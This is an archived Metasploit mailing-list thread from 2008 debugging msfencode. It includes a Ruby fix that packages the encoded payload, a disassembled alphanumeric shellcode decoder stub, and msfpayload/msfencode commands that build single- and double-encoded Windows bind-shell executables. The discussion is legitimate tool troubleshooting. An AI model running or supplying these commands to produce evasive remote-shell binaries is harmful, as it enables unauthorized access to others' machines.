Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

MSFEncode bug doesn't encode EXE's or VBA's

From: natron at invisibledenizen.org (natron)
Date: Fri, 19 Dec 2008 14:32:49 -0600
I can verify seeing a similar (same?) XOR error whenever I use the
AlphanumMixed or AlphanumUpper encoders.  I thought I was doing
something wrong...but perhaps it's a bug in the encoder.

I get the AV on:

XOR BYTE PTR DS:[ECX+33],AL

While ECX is FFFFFFFD... which causes an AV when it tries to write
that XOR to 0x00000030.

So reverting the template fixes that, eh?  That's fantastic, thanks
for letting the list know your work around!

The windows/tcp_bind payload is encoding to this:


54               PUSH ESP ; shellcode begins here
5B               POP EBX
DAD0             FCMOVBE ST,ST
D973 F0          FSTENV (28-BYTE) PTR DS:[EBX-10]
5E               POP ESI
5E               POP ESI
56               PUSH ESI
59               POP ECX
49               DEC ECX
49               DEC ECX
49               DEC ECX
43               INC EBX
43               INC EBX
43               INC EBX
43               INC EBX
43               INC EBX
43               INC EBX
43               INC EBX
51               PUSH ECX
5A               POP EDX
56               PUSH ESI
54               PUSH ESP
58               POP EAX
3330             XOR ESI,DWORD PTR DS:[EAX]
56               PUSH ESI
58               POP EAX
34 41            XOR AL,41
50               PUSH EAX
3041 33          XOR BYTE PTR DS:[ECX+33],AL

N


On Fri, Dec 19, 2008 at 2:03 PM, Mark Baggett <huperdefigo at gmail.com> wrote:

It seems there is an error in msfencode.  Today It doesn't encode the
payload when an output type of EXE or VBA is selected.   Looking at
code, the problem for payloads of type exe  and vba is this:

First the varialbe raw is assigned the encoded payload return by the
encode function..

Line 159
# Encode it up
raw = enc.encode(buf, badchars)

Then when it creates its exe it uses buf (the unencoded payload) again
rather than raw (the encoded payload)

Line 173
exe = Rex::Text.to_win32pe(buf, "")

I changed it to raw ...
exe = Rex::Text.to_win32pe(raw, "")

and it will then encodes payloads of type exe.   But the encoded payloads do not
work.   Using ollydbg I can see a memory access violation when the
actual xor encoding attempts to write to code segment where the
payload runs.     I reverted to the template.exe distributed prior to
the Sept 29th update (Change set 5689)  and it everything works fine
now.

The same error is in the code for encoding vba output.

After those three changes I am able to make encoded payloads...

./msfpayload windows/shell_bind_tcp R | ./msfencode -t exe -o
~/winbindencoded.exe

and double encoded payloads...

./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/countdown
-t raw | ./msfencode -t exe -o ~/winbinddoubleencode.exe

Mark Baggett
http://markremark.blogspot.com
_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: